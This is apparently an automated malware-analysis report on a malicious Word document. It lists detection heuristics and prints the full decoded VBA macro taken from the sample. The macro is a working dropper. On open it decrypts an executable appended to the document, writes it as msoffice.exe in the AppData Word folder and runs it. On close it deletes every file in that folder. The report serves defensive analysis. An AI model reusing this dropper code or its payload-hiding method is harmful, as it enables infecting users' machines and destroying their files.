MALICIOUS
346
Risk Score
Heuristics 13
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set asdvfdgdfbnghnhng = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FSO = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
rljosd = Environ("appdata") & "\Microsoft\Word" -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 1,275,268 bytes but its declared streams total only 613,068 bytes — 662,200 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3232 bytes |
SHA-256: cda54ba5e7ce040f3c142b142b81382d754385fc2cced23f9da00e58d4afacdc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Printer"
Public asdifbcs As String
Public rljosd As String
Function fcddsf4fd(sncvidir() As Byte, saapdawd As Long) As Byte
For I = 0 To saapdawd - 1
fcddsf4fd = fcddsf4fd Xor sncvidir(I)
Next I
End Function
Function pasdnaiduads(sncvidir() As Byte, saapdawd As Long) As Boolean
Dim VarByte As Byte
VarByte = 35
For I = 0 To saapdawd - 1
sncvidir(I) = sncvidir(I) Xor VarByte
VarByte = ((VarByte Xor 217) Xor (I Mod 256))
Next I
pasdnaiduads = True
End Function
Sub AutoClose()
On Error Resume Next
Kill asdifbcs
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.DeleteFile rljosd & "\*.*", True
Set FSO = Nothing
End Sub
Sub AutoOpen()
On Error GoTo poasdindvsidfbv
Set asdvfdgdfbnghnhng = CreateObject("WScript.Shell")
Dim rtgfggjuyjsasawefsd
Dim sadbniasdfhsvb As Long
Dim saapdawd As Long
Dim edwefibvfdvcdfb As Byte
sadbniasdfhsvb = FileLen(ActiveDocument.FullName)
rtgfggjuyjsasawefsd = FreeFile
Open (ActiveDocument.FullName) For Binary As #rtgfggjuyjsasawefsd
Get #rtgfggjuyjsasawefsd, (sadbniasdfhsvb - 4), edwefibvfdvcdfb
Get #rtgfggjuyjsasawefsd, (sadbniasdfhsvb - 3), saapdawd
If saapdawd < 8 Then
GoTo poasdindvsidfbv
End If
If (saapdawd + 4) > sadbniasdfhsvb Then
GoTo poasdindvsidfbv
End If
Dim sdfsdfsvoxcvcvbcvb As Long
sdfsdfsvoxcvcvbcvb = sadbniasdfhsvb - (saapdawd + 4)
Dim sncvidir() As Byte
ReDim sncvidir(saapdawd - 1)
Get #rtgfggjuyjsasawefsd, sdfsdfsvoxcvcvbcvb, sncvidir
Close #rtgfggjuyjsasawefsd
If Not pasdnaiduads(sncvidir(), saapdawd) Then
GoTo poasdindvsidfbv
End If
Dim sdfsfdfgbnghj As Byte
sdfsfdfgbnghj = fcddsf4fd(sncvidir(), saapdawd)
If edwefibvfdvcdfb <> sdfsfdfgbnghj Then
GoTo poasdindvsidfbv
End If
rljosd = Environ("appdata") & "\Microsoft\Word"
Set FSO = CreateObject("Scripting.FileSystemObject")
If Not FSO.FolderExists(rljosd) Then
rljosd = Environ("appdata")
End If
Set FSO = Nothing
Dim ergdfbfghtyjnjfgs
ergdfbfghtyjnjfgs = FreeFile
asdifbcs = rljosd & "\" & "msoffice.exe"
Open (asdifbcs) For Binary As #ergdfbfghtyjnjfgs
Put #ergdfbfghtyjnjfgs, 1, sncvidir
Close #ergdfbfghtyjnjfgs
Erase sncvidir
asdvfdgdfbnghnhng.Run asdifbcs
ActiveDocument.Save
ActiveDocument.Close
Exit Sub
poasdindvsidfbv:
Close #rtgfggjuyjsasawefsd
Close #ergdfbfghtyjnjfgs
ActiveDocument.Save
ActiveDocument.Close
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.